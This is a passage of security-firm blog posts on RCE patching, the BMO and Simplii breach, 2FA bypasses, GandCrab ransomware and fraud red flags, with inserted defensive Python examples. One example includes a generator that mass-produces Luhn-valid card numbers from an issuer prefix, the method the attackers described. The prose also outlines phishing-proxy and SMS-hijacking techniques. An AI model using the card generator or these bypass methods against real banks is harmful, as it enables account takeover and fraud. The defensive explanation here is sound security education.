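The two fixes are independent and both are needed: the allow-list stops the obviously bad input, and dropping `shell=True` means that whatever does get through is only ever an argument to the intended program, never a new command.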
Timely patching, that is, timely installation of software updates, is the top cybersecurity measure for preventing remote code execution attacks.
For instance, to prevent remote code execution via CVE-2018-8248, Microsoft's June 12, 2018 security update has to be installed. In the case of WannaCry, remote code execution via the SMB vulnerability could have been prevented if Microsoft's March 2017 security update had been applied in time; disabling SMBv1 altogether, which Microsoft has recommended for years, removes that attack surface even on hosts that are late to patch.
To stop attackers infecting vulnerable servers with cryptocurrency mining malware, the initial attack must be blocked. That initial attack is typically the exploitation of a remote code execution vulnerability to launch the malware, as in WannaCry.
If your organization runs computers or servers with software known to be vulnerable to remote code execution, the vendor's patch for that vulnerability must be applied promptly.
As a rule of thumb, to significantly minimize the risk, your company must collect, analyze and act on current threat intelligence, and your IT team must have tooling that applies patches promptly. Better yet, workstation and server patching can and should be automated, backed by an inventory that shows which hosts are still missing a given update, since an unpatched host that nobody knows about is exactly what WannaCry found.
2 Canadian Banks, BMO & CIBC’s Simplii Financial, Disclose Data Breaches
Two Canadian banks, Bank of Montreal (BMO) and Canadian Imperial Bank of Commerce-owned Simplii Financial, disclosed early this week that cyber criminals may have stolen sensitive data on a combined 90,000 of their customers.
BMO is Canada's 4th largest bank, while the Canadian Imperial Bank of Commerce (CIBC) is the country's 5th largest.
A spokesman for Bank of Montreal told Reuters that nearly 50,000 of the bank's 8 million customers across Canada were affected. CIBC's Simplii Financial, meanwhile, disclosed that fraudsters may have stolen certain personal and account information for nearly 40,000 of its customers.
According to CBC, a group of cyber criminals claiming to have stolen the data sent an email to media outlets across Canada last Monday. The attackers said the stolen data would be sold to criminals unless the banks paid a $1-million ransom in the cryptocurrency Ripple by 11:59 p.m. that day.
The attackers claimed that they’ve harvested personally identifiable information from customers of the 2 banks, including social insurance number, date of birth, address and phone number.
To prove the veracity of the email, the sender shared identifying information for two Canadians, one customer of each bank. When CBC contacted those two individuals, they confirmed that the information was accurate.
The ransom deadline has already passed. When contacted by CBC about whether any ransom had been paid, Bank of Montreal said, "Our practice is not to make payments to fraudsters."
Simplii, for its part, said that it’s "continuing to work with cybersecurity experts, law enforcement and others to protect our Simplii clients' data and interests."
The attacks on BMO and Simplii are noteworthy because both were disclosed on the same day by the two financial institutions, and the same group claims to have attacked both using the same method.
The email sent out by the group who claimed to have stolen data from BMO and Simplii Financial explained in detail how the data breaches on the 2 financial organizations were carried out.
According to the email sender, accounts at BMO and Simplii Financial were breached by using the Luhn algorithm, the checksum formula used to validate payment card numbers, to generate card numbers that the banks' systems would accept as valid.
Using the generated card numbers, the attackers then posed as authentic customers who had forgotten their password. The group said the generated card numbers allowed them to reset the backup security questions and answers and reset the passwords.
“They were giving too much permission to half-authenticated account which enabled us to grab all these information,” the email said.
In Simplii Financial's official statement, the organization advised customers to always "use a complex password and pin (eg. not 12345)". This statement suggests that the bank was not using 2-factor authentication. BMO, meanwhile, offers 2-factor authentication.
A customer at Simplii Financial told The Globe and Mail that he was unable to log in to his account and that the security questions used to recover his password had been changed.
In a study, Newcastle University researchers found that it takes only seconds to guess a valid card number once you know the first six digits (the issuer prefix, which identifies the bank and card type) and apply the Luhn algorithm. The algorithm was designed so that websites and terminals can immediately reject mistyped card numbers; it was never meant to be a secret, and it offers no protection against someone deliberately generating numbers that pass it.
"As an example, suppose one's credit card number is 5377223617291234. Here, the '4' is the check digit. This digit can be determined solely from the digits that precede it through what is called the Luhn Algorithm," the Oxford Math Center explains. "If when entering this credit card number, one accidentally types a '7' where the right-most "1" should be (i.e., 5377223617297234), the check digit produced from the first 15 digits, in accordance with the Luhn Algorithm, will now disagree with '4' on the end – flagging this as an invalid credit card number."
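The arithmetic behind the check digit, as an added example that is not code from the article, from the Oxford Math Center or from the Newcastle study: a Luhn validator and check-digit generator, plus an enumerator that produces numbers carrying a chosen issuer prefix, which is the step the attackers described. The function names and the prefix it is called with are illustrative assumptions; the 16-digit number in the usage is the Oxford Math Center's example quoted above.

```python
"""Luhn check-digit arithmetic (added example, not from the article).

The point: anyone can compute the check digit, so a bank's six-digit issuer
prefix plus the Luhn rule is enough to mass-produce numbers that pass the
syntactic check. The algorithm catches typos; it does not authenticate.
"""
from itertools import product
from typing import List


def luhn_checksum(digits: str) -> int:
    """Return the Luhn sum mod 10 of a digit string, check digit included."""
    total = 0
    # Walk from the right. Every second digit, starting with the one just left
    # of the check digit, is doubled; a doubled value above 9 has 9 subtracted.
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10


def luhn_valid(number: str) -> bool:
    """True if the full number (check digit included) passes the Luhn test."""
    return number.isdigit() and luhn_checksum(number) == 0


def luhn_check_digit(partial: str) -> str:
    """Compute the check digit for the digits that precede it."""
    # Append a placeholder 0, then choose the digit that makes the sum 0 mod 10.
    return str((10 - luhn_checksum(partial + "0")) % 10)


def generate_from_bin(bin_prefix: str, length: int = 16, limit: int = 5) -> List[str]:
    """Enumerate numbers with the given issuer prefix that pass Luhn (assumed helper).

    There are 10 ** (length - len(bin_prefix) - 1) such numbers; the check digit
    is fully determined, so it adds no entropy. `limit` caps the output.
    """
    free = length - len(bin_prefix) - 1
    out: List[str] = []
    for combo in product("0123456789", repeat=free):
        body = bin_prefix + "".join(combo)
        out.append(body + luhn_check_digit(body))
        if len(out) >= limit:
            break
    return out


if __name__ == "__main__":
    # The Oxford Math Center example from the article, and its one-digit typo.
    print(luhn_valid("5377223617291234"))   # True
    print(luhn_valid("5377223617297234"))   # False
    # Candidate numbers for an illustrative (assumed) prefix.
    print(generate_from_bin("537722", limit=3))
```

Because every number `generate_from_bin` emits is syntactically valid, a "forgot password" flow that treats a well-formed card number as proof of identity is accepting something an attacker can produce at will; the Luhn check belongs in input validation, never in authentication.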
If you’ve an account in either BMO or Simplii Financial, it’s important to monitor your account for signs of unusual activity. Both banks are offering free credit monitoring and guarantee a 100% reimbursement for any unauthorized transaction.
Encrypting stored customer data would have limited the damage of the BMO and Simplii Financial breaches. Organizations, especially those in the financial sector, are required to safeguard the personally identifiable information of their clients. Note, though, that the attackers described a flaw in the account-recovery flow (a "half-authenticated" session being granted too much access), which encryption at rest by itself would not have stopped; fixing the recovery logic and limiting failed attempts matter at least as much.
One of the ways of safeguarding sensitive information is by encrypting the data. Encryption transforms the data into something unreadable, rendering it useless to an attacker who does not also obtain the decryption key.
“The banks involved in claims of a potential data breach acted swiftly in response, launched full-scale investigations and took immediate action to enhance online security measures to protect customers," the Canadian Bankers Association told Bloomberg.
“When you’re dealing with financial information, you should have the highest level of privacy protection possible,” Dr. Ann Cavoukian, former privacy commissioner of Ontario and a distinguished expert-in-residence who leads Ryerson University’s Privacy by Design Centre, told the Financial Post. “This is a real eye-opener. The question that that begs is why weren’t you engaging in those measures all along?”
Top 10 Benefits of a Virtual CISO
No company can afford to underestimate the importance of airtight cybersecurity.
Cyber-criminals continue to develop ever more sophisticated ways to attack organizations and exploit weaknesses. Global corporations invest heavily in protecting their own and their clients' assets, and even smaller enterprises should do the same.
Chief Information Security Officers (CISOs) can make a monumental difference to an organization's defence against risks. They are responsible for handling cybersecurity, creating strategies to reinforce systems against the most cutting-edge external threats. They need to ensure that all essential policies and procedures are in place to reduce the organization's vulnerability.
However, bringing an in-house CISO into your office may not be viable if you lack the space and / or available funds.
Virtual CISOs are an effective, affordable alternative for businesses of all sizes, from tiny startups to international chains. Here are 10 key benefits of hiring one for your company.
1. Low-Cost Expertise
First and foremost, hiring a virtual CISO tends to be far cheaper than employing one full-time.
There are no overheads attached, no benefits to consider, no overtime or sick pay, and you don't pay for idle time. You essentially reap all the rewards of bringing an invaluable asset into your organization while paying for nothing other than their best work.
2. VCISOs Offer More Diverse Knowledge
Most virtual CISOs will possess a wealth of industry experience, having worked with numerous clients across varied sectors.
They are constantly implementing strategies to protect businesses of different sizes against changing threats, gaining valuable knowledge they can apply to your company’s security needs.
This is much more effective and reassuring than hiring a full-time, in-house CISO who may have only worked within one business environment during their career.
3. A Tighter Focus for Better Value
Your virtual CISO specializes in cybersecurity and keeping systems continually protected, developing strategies to reinforce your infrastructure. This is their core focus, their day-to-day commitment.
This is in sharp contrast to bringing an IT specialist into your company who will no doubt be expected to help other employees regain access to their computer, recover forgotten passwords, and remove low-threat malware after someone downloads something they shouldn’t.
You pay for your virtual CISO’s security expertise only, and their time is dedicated to it entirely without less-important distractions.
4. Less Disruption to Everyday Tasks
Hiring a virtual CISO will free up your employees, allowing them the time to focus on their day-to-day tasks and responsibilities without worrying about compliance or related technical issues.
This helps to ensure every department concentrates on their respective goals, free of security-related worries or tasks beyond their technical knowledge.
5. Invaluable Flexibility
Hiring a virtual CISO offers far greater flexibility than a full-time, in-house employee.
For a start, you don’t have to find a place within your company and budget for a new long-term worker. The additional costs that come with that (salary, insurance etc.) are of no concern either.
Furthermore, though, virtual CISOs will generally create tailored services for your exact needs. Perhaps you only want to hire them for a few months to see how it improves your security before committing to a multi-year arrangement. Maybe you’re planning to train your own IT specialists but need the virtual CISO to protect your company in the meantime.
Bringing a virtual CISO aboard in either of these situations is far preferable to hiring a full-time employee and letting them go once you feel they have served their purpose.
6. Bespoke Service for your Business
Virtual CISOs are familiar with adapting to suit different companies with unique needs. While a CISO with experience within one or two businesses may be stuck in their ways and expect you to work around them, virtual specialists are happy to offer more bespoke services.
They will provide the ideal solutions for your company and processes.
7. Vital Industry Contacts
Virtual CISOs are more likely to have wide-ranging industry contacts from across their career. They tend to maintain relationships with fellow cybersecurity specialists, gain exclusive information on emerging threats, and build networks of useful connections.
Such contacts mean they will be able to learn more and gain additional support if they encounter a technical issue they haven’t seen before, enabling them to get a handle on the situation with minimal delay.
This might involve making a phone call to a thought leader or a contact on the front line of cyber-crime – solutions that in-house employees with little experience may be unable to offer.
8. Independent Expertise without Bias
In-house CISOs may be susceptible to the same distractions, petty arguments, and office politics as the rest of your workforce. This can lead them to lose focus on the task at hand and potentially develop their own agendas.
Maintaining the highest levels of security could seem less important to a disgruntled employee who feels they aren’t getting the respect they deserve. Virtual CISOs, though, tend to be completely neutral, channeling all their energy into protecting your company no matter what.
9. Minimal Disruption to your Organization
Your virtual CISO can work independently and without supervision. They will no doubt need to learn about your business and your operations, but they certainly don’t require any training or input.
They will be able to work quickly and efficiently, identifying potential vulnerabilities and updating your system for the utmost protection. Your business will be able to continue as normal without any of the time-consuming training or administrative duties involved with hiring a new full-time employee.
10. Ongoing Commitment and Quality
A CISO working as part of your in-house team will end up leaving you at one time or another, whether they are headhunted by a competitor or simply want a change. This can leave you without their expertise if you wait too long to bring a new specialist aboard, and means you have to start afresh again.
You can enjoy greater continuity and seamless service with a virtual CISO. Even if the person(s) assigned to your business leaves the company you hire, there will be no disruption – you may not even realize a change has occurred at all.
Do you have questions about working with a virtual CISO? Our expert team is here to answer them!
2-Factor Authentication Weakness: It’s also Hackable
Two-factor authentication, also known as 2FA, is one cyberdefense that puts an extra step between you and an attacker. It shouldn't be viewed, however, as a cure-all, because it can itself be bypassed by several well-known techniques.
What is 2-Factor Authentication (2FA)?
Two-factor authentication is an added layer of security that's designed to block intruders even if they know your password. Verification codes can be sent via SMS text or email, or generated by an authenticator app such as Google Authenticator. A hardware token, such as a USB security key, can also serve as the second factor.
Early Security Vulnerability of 2FA
Before 2FA became widely available to the public, this defensive measure was used mainly by high-security government and corporate entities. One of the early adopters of 2FA was Lockheed Martin, the Pentagon's No. 1 supplier.
In 2011, hackers breached Lockheed Martin's network using compromised 2FA token data. The supplier of Lockheed Martin's tokens, the RSA Security Division of EMC Corporation, had acknowledged that it suffered a data breach affecting its SecurID two-factor authentication product.
While RSA did not disclose exactly what was taken, Whitfield Diffie, one of the pioneers of public-key cryptography, told the New York Times that a "master key" – a massive secret number used as part of RSA's encryption algorithm – might have been stolen.
The worst-case scenario, Diffie said, would be that the cyberattacker could reproduce cards that duplicate the ones supplied by RSA to generate two-factor authentication codes, enabling the cyberattacker to gain access to corporate networks and computer systems.
Here are three ways by which cybercriminals get around 2-factor authentication:
1. Man-in-the-Middle Attacks
A man-in-the-middle (MITM) attack is one in which the attacker positions himself in the conversation between a user and an application or website. The attacker may eavesdrop, or impersonate the application or website, so that to the user it looks like a normal exchange of information.
For instance, a MITM attacker may trick you into logging into a fake banking app or site that asks for your 2FA code. Because the attacker is relaying your input to the real service in real time, the code is used before it expires, and the attacker ends up with an authenticated session in your name.
An example of malware that fools users into exposing their 2-factor authentication code is the Android banking trojan called "Acecard". One of the ways Acecard gets onto victims' devices is by being listed as a seemingly legitimate game app in the Google Play store. Once the Acecard app is installed on the victim's mobile device, it lies in wait until the victim launches a legitimate banking app.
Once the malware detects which banking app is used, it then overlays a fake banking app interface, fooling the user that he’s inside a legitimate banking interface.
The login details entered in the fake app are then sent by the malware to the attacker and these details are used to login into the victim’s real banking app to withdraw money.
Acecard can complete a fraudulent transaction because it also hijacks the SMS message containing the one-time password that the bank's system sends as part of 2-factor authentication.
The SMS message containing one-time password sent by the bank’s system to the victim’s phone as part of two-factor authentication is then intercepted by the malware and sent to the attacker. The malware also intercepts and sends to the attacker the transaction confirmation.
Victims have, therefore, no knowledge about the SMS message as well as the transaction confirmation. Victims will only know about the withdrawal transaction when they check their bank account balance and transaction history.
Mobile banking malware like Acecard can hijack SMS messages simply by requesting the SMS permission at install time, which many users grant without a second thought.
According to Kaspersky, Acecard is capable of attacking users of nearly 50 different online financial apps and services, as well as messaging and social apps including WhatsApp, Viber, Instagram, Skype, VKontakte, Odnoklassniki, Facebook, Twitter, Gmail and PayPal.
KnowBe4 Chief Hacking Officer Kevin Mitnick recently demonstrated how LinkedIn's 2-factor authentication can be bypassed. Mitnick used the phishing proxy developed by white hat hacker Kuba Gretzky called "Evilginx". To bypass LinkedIn's 2-factor authentication, Mitnick lures the user to a look-alike domain where Evilginx proxies the real LinkedIn login page, so the user completes the genuine 2FA step while Evilginx captures the credentials and the resulting session cookie.
"I'm releasing my latest Evilginx project, which is a man-in-the-middle attack framework for remotely capturing credentials and session cookies of any web service," Gretzky wrote of his Evilginx project. "It uses the Nginx HTTP server to proxy the legitimate login page to visitors, and captures credentials and session cookies on-the-fly. It works remotely, uses a custom domain and a valid SSL certificate."
Gretzky added that Evilginx can be adapted to work with any website.
2. Exploiting Account-Recovery Systems
Another way cyberattackers bypass 2-factor authentication is by exploiting the account-recovery systems.
Attackers who already hold a victim's personally identifiable information can use the account-recovery feature of many websites to get around 2-factor authentication: answering password-reset questions with details they stole earlier, or calling support and talking an agent into resetting the account.
3. Brute Force Attacks
While many websites and online services offer 2-factor authentication, many have no bad-login-attempt control, that is, they neither lock the account nor throttle requests after a number of failed 2-factor authentication attempts.
Without such a control, an attacker can submit guesses automatically until one is accepted. A six-digit code has only one million possible values, and each guess costs one login request rather than any computing power, so the limiting factor is how many attempts the server tolerates, not how fast the attacker's hardware is. Rate limiting and a lockout after a handful of failed codes close this gap.
Some of the measures that keep attackers from getting past your second factor: be careful about which apps you grant access to your SMS messages, scan apps for malware, be vigilant about links that might lead you to look-alike websites, and don't make your password-reset questions easy for a stranger to answer.
Two-factor authentication isn’t meant to replace other good cybersecurity practices. It’s meant only as an additional layer of security.
When you need help, our security professionals are a phone call away.
How to Avoid Being a Victim of Email-Based Ransomware
The latest version of the ransomware called “GandCrab” is an example of how cyber attackers bait their ransomware victims through email spam campaign.
Last month, security researchers at Fortinet observed a surge in an email spam campaign delivering the latest version of GandCrab ransomware.
GandCrab ransomware is a malicious software (malware) that encrypts files on the compromised computers, locks out users and demands a payment to decrypt or unlock the files.
How Ransomware Victims Are Baited via Email Spam Campaign
The latest version of GandCrab ransomware is spread by spam emails. While these emails don't target specific individuals, they do concentrate on specific countries: addresses in the US are the primary recipients of this campaign, followed by the UK and Canada.
Recipients are tricked into opening these malicious emails because the attackers use subject lines of the kind people in an organization routinely exchange:
Once the malware is downloaded to a compromised computer, the files on it are encrypted, preventing the user from accessing them, and a ransom note is displayed on the screen.
This ransom note directs the user to a site reachable only through the Tor browser, a browser designed to protect privacy and anonymity. Once accessed, this site tells the victim that files on the compromised computer have been encrypted. The victim is asked to pay USD 800 within a certain period. If payment is not made within the allowed period, the cost of decrypting the files is doubled.
GandCrab Ransomware Earlier Versions
The first version of GandCrab ransomware appeared in the wild on January 30, 2018.
This early version was likewise distributed via spam emails purporting to be invoices. It was also distributed via malicious advertisements (malvertisements) that linked to malicious websites, where the download of the ransomware was then initiated.
Like the latest version, the first version of GandCrab encrypts the files on the compromised computer. Instead of asking for ransom payment denominated in US dollars, the first version asked for payment in the Dash cryptocurrency, the first time this cryptocurrency had been used in a ransomware campaign. In the past, ransomware attackers preferred the cryptocurrencies Bitcoin and Monero for ransom payment.
According to Europol, European Union’s law enforcement agency, GandCrab ransomware is run as an affiliate program or ransomware-as-a-service. Anyone who wants to join the GandCrab affiliate program pays 30% to 40% of the ransom revenues to its creator and in return gets a full-featured web panel and technical support.
According to Check Point, as of March 13, 2018, GandCrab has infected over 50,000 computer systems and received an equivalent of USD 300,000 to USD 600,000 in ransom payments.
A tool to decrypt files encrypted by GandCrab (version 1) was developed through a combined effort of the Romanian authorities, Bitdefender and Europol and made available to the public for free.
According to Check Point, the decryptor wasn't the result of a cryptographic breakthrough. It was made possible by law enforcement's access to the ransomware's master server, which allowed the recovery of the private keys needed to undo the encryption performed by GandCrab (version 1); this is why the decryptor depends on the victim ID being available.
The developers of GandCrab, however, regularly modify the ransomware, so the decryption tool developed by the Romanian authorities, Bitdefender and Europol does not work against later versions and will not bring those files back.
Paying the ransom for the latest version of GandCrab is, therefore, not advisable as this doesn’t guarantee that the attackers have the capability or any intention to decrypt files.
Social Engineering Feature of GandCrab Ransomware
As can be gleaned from the different versions of GandCrab ransomware, social engineering is employed.
Social engineering cyberattack happens when an attacker uses a typical form of human interaction to obtain information about an organization or to compromise the organization’s computer systems.
Today's human interaction increasingly happens through technology. Much of it takes place over email, a form of online communication that has endured despite the advent of newer forms such as instant messaging, social networking and online chat.
GandCrab isn't the only ransomware that relies on spam emails for its distribution. Other notorious ransomware like Spora and Locky are also distributed through spam emails. For instance, on August 28th last year, in just a matter of 24 hours, over 23 million spam emails were sent carrying the Locky ransomware.
It is worth noting that all three of these ransomware families, GandCrab, Spora and Locky, tricked their victims into opening ransomware-laden email attachments by using the subject "Invoice".
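A triage rule for the lure pattern just described, as an added example that is not code from the article or from any vendor it cites. It parses raw messages with Python's standard email library and flags the combination of a generic business subject such as "Invoice" with an attachment of a type that can run code or hide an executable. The sample messages are constructed for the example, and the subject keywords and risky extensions are assumptions, not a published GandCrab indicator list.

```python
"""Invoice-lure attachment triage (added example, not from the article).

Rule: a lure-style subject on its own is normal business mail; an executable,
script, macro-enabled or archive attachment on its own deserves a look; the
two together, or a double extension such as Invoice.pdf.js, is the classic
ransomware delivery shape and gets blocked.
"""
import email
from email import policy
from email.message import EmailMessage
from typing import List, Tuple

# Assumed lists for illustration; tune to your own mail flow.
LURE_SUBJECTS = ("invoice", "payment", "receipt", "order", "document")
RISKY_EXTENSIONS = (".exe", ".js", ".jse", ".vbs", ".wsf", ".scr", ".hta",
                    ".docm", ".xlsm", ".zip", ".rar", ".7z", ".lnk", ".bat", ".cmd")


def attachment_names(msg: EmailMessage) -> List[str]:
    """Filenames of all parts delivered as attachments."""
    return [part.get_filename() or "" for part in msg.iter_attachments()]


def triage(raw: str) -> Tuple[str, List[str]]:
    """Return ('block' | 'review' | 'allow', reasons) for one raw RFC 822 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = (msg["subject"] or "").lower()
    reasons: List[str] = []
    lure = any(word in subject for word in LURE_SUBJECTS)
    if lure:
        reasons.append(f"lure subject: {msg['subject']!r}")
    for name in attachment_names(msg):
        lower = name.lower()
        if lower.endswith(RISKY_EXTENSIONS):
            reasons.append(f"executable, script or archive attachment: {name!r}")
            # A second extension is a disguise: the user sees "pdf", the OS runs "js".
            if lower.count(".") >= 2:
                reasons.append(f"double extension: {name!r}")
    if lure and len(reasons) > 1:
        return "block", reasons
    if reasons:
        return "review", reasons
    return "allow", reasons


def build_sample(subject: str, filename: str, body: bytes) -> str:
    """Construct a sample message (not a real captured spam mail)."""
    msg = EmailMessage()
    msg["From"] = "accounts@example.net"
    msg["To"] = "staff@example.com"
    msg["Subject"] = subject
    msg.set_content("Please see the attached.")
    msg.add_attachment(body, maintype="application", subtype="octet-stream",
                       filename=filename)
    return msg.as_string()


# Constructed samples covering the three outcomes.
SAMPLES = {
    "lure": build_sample("Invoice #4471", "Invoice_4471.pdf.js", b"var a=1;"),
    "benign": build_sample("Lunch on Friday?", "menu.pdf", b"%PDF-1.4"),
    "suspicious": build_sample("Photos", "holiday.zip", b"PK\x03\x04"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        verdict, why = triage(raw)
        print(f"{label:10s} -> {verdict:6s} {why}")
```

The rule deliberately errs toward "review" rather than "block" for a lone archive, since legitimate ZIPs are common; what it will not let through unexamined is the pairing the three ransomware families above relied on.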
Here are some best practices for avoiding becoming a victim of email-based ransomware like GandCrab:
Are You Failing to Protect Yourself Against Fraud?
Online fraud is, sadly, a common danger.
More than 15 million people fell victim to it in 2016, and the risk is still very much present. Companies across all areas of industry must take steps to protect their finances, making any changes necessary to minimize threats.
Some of these may seem simple, while others appear a tad more complicated. As specialists in cybersecurity, we’re dedicated to helping businesses like yours stay safe against ever-more sophisticated tactics.
So, what changes can you make to your everyday operations to combat online fraud?
You Ignore the Warning Signs
Seeing new customers make large purchases can be an exciting time, but you need to be aware of some common warning signs.
Orders placed late at night could be a red flag, while large orders of products that can be resold easily are another fraud giveaway to watch out for.
Another red flag? Multiple attempts to buy an expensive item (or items) with the same payment method, but with minor differences in the expiration date or name.
Purchases made by buyers who have been repeat customers for a long time should be watched if they make an unusual change in their purchases, address, contact details, and order size.
Last but not least: be wary of customers buying goods with a domestic billing address but sending the purchases to international locations. This is especially true if multiple international addresses are used.
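The warning signs above expressed as a scoring rule, as an added example that is not code from the article. The `Order` and `Profile` fields, the weights and thresholds, and the sample orders are all constructed assumptions for illustration; a merchant would tune the weights against its own chargeback history.

```python
"""Order risk scoring over the red flags listed above (added example, not from the article)."""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Order:
    order_id: str
    customer_id: str
    hour_local: int          # hour of day at the customer's location, 0-23
    total_usd: float
    resale_friendly: bool    # electronics, gift cards and the like
    card_last4: str
    card_exp: str            # "MM/YY" exactly as entered
    name_on_card: str
    billing_country: str
    shipping_country: str
    shipping_address: str


@dataclass
class Profile:
    """What the merchant already knows about a repeat customer."""
    orders: int
    usual_country: str
    usual_address: str
    avg_total_usd: float


def score_order(order: Order, history: List[Order],
                profiles: Dict[str, Profile]) -> Tuple[int, List[str]]:
    """Return (risk score, reasons); higher means more suspicious."""
    score, reasons = 0, []
    if order.hour_local >= 23 or order.hour_local < 5:
        score += 1
        reasons.append("placed late at night")
    if order.resale_friendly and order.total_usd >= 500:
        score += 2
        reasons.append("large order of easily resold goods")
    # Same card retried with a slightly different expiry date or name.
    for prev in history:
        if prev.card_last4 != order.card_last4 or prev.order_id == order.order_id:
            continue
        if prev.card_exp != order.card_exp or prev.name_on_card != order.name_on_card:
            score += 3
            reasons.append(f"card *{order.card_last4} retried with changed expiry or name")
            break
    if order.billing_country != order.shipping_country:
        score += 2
        reasons.append("domestic billing address, international delivery")
        foreign = {o.shipping_address for o in history
                   if o.customer_id == order.customer_id
                   and o.shipping_country != o.billing_country}
        if foreign and order.shipping_address not in foreign:
            score += 2
            reasons.append("multiple international delivery addresses")
    prof = profiles.get(order.customer_id)
    if prof and prof.orders >= 10:
        if (order.shipping_address != prof.usual_address
                or order.shipping_country != prof.usual_country):
            score += 2
            reasons.append("long-standing customer changed delivery details")
        if order.total_usd > 4 * prof.avg_total_usd:
            score += 2
            reasons.append("order size far above the customer's average")
    return score, reasons


def decision(score: int) -> str:
    if score >= 5:
        return "hold for manual review"
    if score >= 3:
        return "request extra verification"
    return "approve"


# Constructed sample data (not real orders or customers).
HISTORY = [
    Order("A1", "c100", 13, 80.0, False, "4242", "11/25", "J. Doe", "CA", "CA", "5 Elm St, Toronto"),
    Order("A2", "c200", 9, 55.0, False, "9001", "01/26", "A. Smith", "US", "US", "1 Main St, Austin"),
]
PROFILES = {"c200": Profile(orders=25, usual_country="US",
                            usual_address="1 Main St, Austin", avg_total_usd=60.0)}
NEW_ORDERS = [
    Order("B1", "c100", 1, 1200.0, True, "4242", "11/26", "J. Doe", "US", "NG", "12 Harbour Rd, Lagos"),
    Order("B2", "c200", 14, 400.0, False, "9001", "01/26", "A. Smith", "US", "US", "99 Other Rd, Dallas"),
    Order("B3", "c300", 10, 45.0, False, "5555", "03/27", "P. Lee", "US", "US", "7 Oak Ave, Denver"),
]

if __name__ == "__main__":
    for o in NEW_ORDERS:
        s, why = score_order(o, HISTORY, PROFILES)
        print(o.order_id, s, decision(s), why)
```

The point of scoring rather than hard-blocking on any single sign is that each flag alone is common in honest traffic; it is the accumulation (a night-time, resale-friendly, international order on a card that has already been tried with a different expiry) that separates fraud from an unusual but genuine customer.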
You Don’t Invest in the Best Security
In our experience, too many businesses, both big and small, invest too little in their cybersecurity. Even though businesses are expected to spend more than $100bn on online protection in 2020, it's still not uncommon to see companies letting themselves down.
It’s easy to assume you can handle your business’s online security when you first enter the market. After all, download some anti-virus software, get yourself a firewall – job done, right?
Sadly, it’s not so simple. Finding the budget for high-quality security protocols can be difficult, but it’s vital – you’re reinforcing your company’s infrastructure, protecting your assets, and minimizing further expense.
In other words: take the danger of online fraud seriously. Your customers and your employees are depending on you to keep their details and their money safe.
You Haven’t Educated Your Team
Your workforce has to be educated on the signs of online fraud, trained in criminals’ latest tactics and the techniques available to combat them.
After all, they’re the people keeping your operations running day in, day out. They’re handling customers’ purchases, processing transactions, communicating with buyers, using your databases, downloading resources, and more.
Uninformed staff may end up making mistakes that leave your business vulnerable, facing fraudulent activity, and ultimately at risk. When they have the information and the training, they can actually be a much-needed defense against cyber criminals preying on companies like yours.
Make sure you host regular meetings to train your employees on the cyber-security threats they are likely to encounter, and the warning signs they should watch out for. This doesn’t have to be at an expert level, as you don’t want to overwhelm or confuse them, but it should be enough to give them the confidence they need to perform at their best.
Your staff should know enough to identify possible fraudulent behavior, handle customers’ personal information properly, and avoid leaving your business exposed.
You Haven’t Implemented a Reliable Password Policy
Passwords have to be strong, hard to guess, and varied. Make sure your employees and your customers have the information and advice they need to avoid weak passwords.
We all have so many passwords to remember today. Many of us run numerous different aspects of our lives online, relying on online banking, online shopping, online communications … it’s easy to be complacent.
However, complacency leads people to use the same passwords again and again. A customer who creates an account with your business using a password that has already leaked from another site has, without realizing it, handed an attacker the key to that account.
This could lead to fraudulent purchases, and the customer might blame your company for failing to give them sufficient advice on how to create strong passwords.
It's vital, then, to provide helpful information at the sign-up stage and on a dedicated page on your site. Make sure customers know not to use something simple and easy to find out, such as a child's name or a birthday. Of the usual tips, length matters most: combining several unrelated words into a long passphrase does far more than swapping in a symbol or two, and a password should be unique to each site.
Your employees should follow the same strategy. Using the same password for their work email or accounts as for their personal ones increases your business's vulnerability, because a breach of any one of those services exposes your systems too.
You Don’t Run Background Checks on Your Employees
Hiring employees with a history of criminal activity or suspicious behavior in previous roles (leading to dismissals) can be an easy way to expose your business to fraud.
Running background checks may seem to be something of a hassle, but it’s well worth doing to protect your company. This should consist of criminal background checks, their education, and their past employment – you will have the information to identify who you have working for you.
Trust goes a long, long way in maintaining an efficient, satisfied workforce. If you know your team is unlikely to undertake fraudulent activity and put your company’s and your customers’ data at risk, you can focus on combating external dangers instead.
Employees will generally accept that these background checks are par for the course. Though it might seem intrusive, it’s for the good of your company, your clients, and your reputation.
Online fraud is an intimidating area and makes businesses of all sizes feel vulnerable. Taking the steps explored above is an effective start to a stronger infrastructure, but you should trust the professionals to reinforce (and maintain) your business’s cybersecurity program for maximum protection against threats.
Contact us today to assess your risks and protect your business.
Steve E. Driz